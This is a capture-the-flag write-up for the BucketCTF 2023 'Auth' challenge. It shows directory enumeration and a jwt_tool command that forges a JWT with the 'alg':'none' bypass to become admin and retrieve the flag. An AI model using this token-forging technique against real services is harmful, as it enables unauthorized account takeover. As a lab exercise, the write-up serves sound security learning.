BucketCTF 2023 - Auth
Table of Contents
BucketCTF 2023 - This article is part of a series.
Clock 2 #
Description #
I just started learning about a new authentication method called JWT. This is my first website with it, could you check if its secure?
TL;DR #
As the description indicates, we will certainly have to exploit a JWT vulnerability, on the website there is a /register page which allows us to register and thus be able to have JWT tokens for our account.
However no route accessible by default allows us to provide a JWT token to the server.
So we just have to find a route or a way to send a JWT token to the server to be able to try to bypass this authentication.
Solution #
First i ran a gobuster on the website to see if there is a page where we can provide a JWT token.
The /info route lead to a /validate route needing a token as a GET parameter.
We will now try to exploit the JWT token with the jwt_tool fork of dillonfrank to have a support of GET parameters :
Then i replaced [0-4] with 0 and [5-9] with 1.
~$ python3 jwt_tool.py -M at -t "http://213.133.103.186:6307/validate?" -gd "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QyIiwiaWF0IjoxNjgwOTk2ODgyfQ.2qodlmGmM19ZFZE-aCWb1FyC9YNiHwxrRw2Bu3WX840" -I -pc username -pv admin
[...]
jwttool_e0e5c45b9f118f38e4bccbf97821f92e Exploit: "alg":"none" (-X a) Response Code: 200, 37 bytes
[...]
~$ python3 jwt_tool.py -Q "jwttool_e0e5c45b9f118f38e4bccbf97821f92e"
We can see that the server return a 200 with a none algorithm, we can just query the result and we get the flag.
Flag #
bucket{1_l0v3_jwt!!!1!!!!1!!!!!1111!}